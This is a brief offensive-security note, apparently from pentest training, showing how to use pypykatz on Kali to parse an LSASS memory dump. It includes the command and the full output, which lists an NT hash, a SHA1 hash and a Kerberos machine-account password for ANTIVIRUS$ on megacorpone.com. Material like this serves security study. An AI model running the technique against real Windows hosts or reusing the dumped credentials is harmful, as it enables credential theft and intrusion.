Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system
link: https://github.com/skelsec/pypykatz
usage:
root@kali:/opt/pypykatz$ pypykatz lsa minidump /tmp/lsass.DMP
INFO:root:Parsing file /tmp/lsass.DMP
FILE: ======== /tmp/lsass.DMP =======
== LogonSession ==
authentication_id 155103039 (93eaf3f)
session_id 4
username DWM-4
domainname Window Manager
logon_server
logon_time 2020-08-03T09:50:02.108939+00:00
sid S-1-5-90-0-4
luid 155103039
== MSV ==
Username: ANTIVIRUS$
Domain: MCO
LM: NA
NT: c066a8ac9ebefea4da87f00005acd517
SHA1: 1d645a77408ec4a2469bd32d0cf324685dc13893
== WDIGEST [93eaf3f]==
username ANTIVIRUS$
domainname MCO
password None
== Kerberos ==
Username: ANTIVIRUS$
Domain: megacorpone.com
Password: -0PPRSd2\\51d]:8`n&vPviLX\\TJ7vf$DGGPeL\\fCrhb/N!F[+1$"2?3tc&4; (0k B;X]]Yc%H*01R5]RrSz2]`tft]R534>$8ud;F%/@)@S7ovcT7j.6!s,
== WDIGEST [93eaf3f]==
username ANTIVIRUS$
domainname MCO
password None